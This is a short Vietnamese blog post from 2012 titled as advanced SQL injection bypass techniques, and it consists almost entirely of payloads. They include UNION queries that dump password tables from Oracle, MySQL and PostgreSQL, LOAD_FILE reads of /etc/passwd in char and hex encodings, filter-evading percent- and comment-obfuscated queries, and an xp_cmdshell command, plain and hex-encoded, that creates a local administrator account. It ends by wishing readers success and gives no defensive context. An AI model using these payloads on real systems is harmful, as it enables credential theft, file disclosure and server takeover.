Thứ Bảy, 16 tháng 6, 2012
Các kỹ thuật bypass SQL Injection Nâng Cao
Ví dụ:
Code:
"SELECT name, surname FROM users WHERE name='" . $_GET['name'] . "'"
Code:
SELECT name, surname FROM users WHERE
name='foobar\' OR 10>4--'
Code:
SELECT name, surname FROM users WHERE
name='foobar\' UNION ALL SELECT NAME,
PASSWORD FROM SYS.USER$--'
Code:
SELECT name, surname FROM users WHERE
name='foobar\' OR ASCII(SUBSTR((SQL
query), Nth SQL query output char, 1))
> Bisection algorithm number--'
Code:
LOAD_FILE('/etc/passwd')
Code:
LOAD_FILE(CHAR(47,101,116,99,47,112,97, 115,115,119,100))
Code:
LOAD_FILE(0x2f6574632f706173737764)
vd:
Code:
SELECT pg_sleep(3)
Code:
S%ELEC%T %p%g_sle%ep(%3)
vd:
Code:
exec master..xp_cmdshell 'NET USER myuser mypass /ADD & NET LOCALGROUP Administrators myuser /ADD'
Code:
DECLARE @rand varchar(8000) SET @rand = 0x65786563206d61737465722e2e78705f636d6473 68656c6c20274e45542055534552206d7975736572 206d7970617373202f4144442026204e4554204c4f 43414c47524f55502041646d696e6973747261746f 7273206d7975736572202f41444427; EXEC (@rand)
vd:
Code:
SELECT user, password FROM mysql.user
Code:
SELECT/*R_aNd*/user/*rA.Nd*/,/*Ran|D */password/*r+anD*/FROM/*rAn,D*/mysq l.user
vd: đối với hệ quản trị PostgreSQL
Code:
SELECT schemaname FROM pg_tables
Code:
%53E%4c%45%43T%20%73%63h%65%6d%61%6e a%6de%20%46%52O%4d%20%70g%5f%74a%62% 6ce%73
vd:
Code:
SELECT user, password FROM mysql.user
Code:
SELECT GROUP_CONCAT(CONCAT(user, 'RaND', password)) FROM mysql.user
Code:
unhex(hex(username))
Bypass với các trường hợp column bị giới hạn
vd:đối với
Code:
SELECT usename, passwd FROM pg_shadow
Code:
UNION ALL SELECT, CHR(109)||CHR(107)||CHR(100)||CHR(83)||CHR (68)||CHR(111)||COALESCE(CAST(usename AS CHARACTER(10000)), CHR(32))||CHR(80)||CHR(121)||CHR(80)||CHR( 121)||CHR(66)||CHR(109)||COALESCE(CAST(pas swd AS CHARACTER(10000)), CHR(32))||CHR(104)||CHR(108)||CHR(74)||CHR (103)||CHR(107)||CHR(90), FROM pg_shadow--
Chúc các bạn thành công.
Đăng ký:
Đăng Nhận xét (Atom)
Không có nhận xét nào: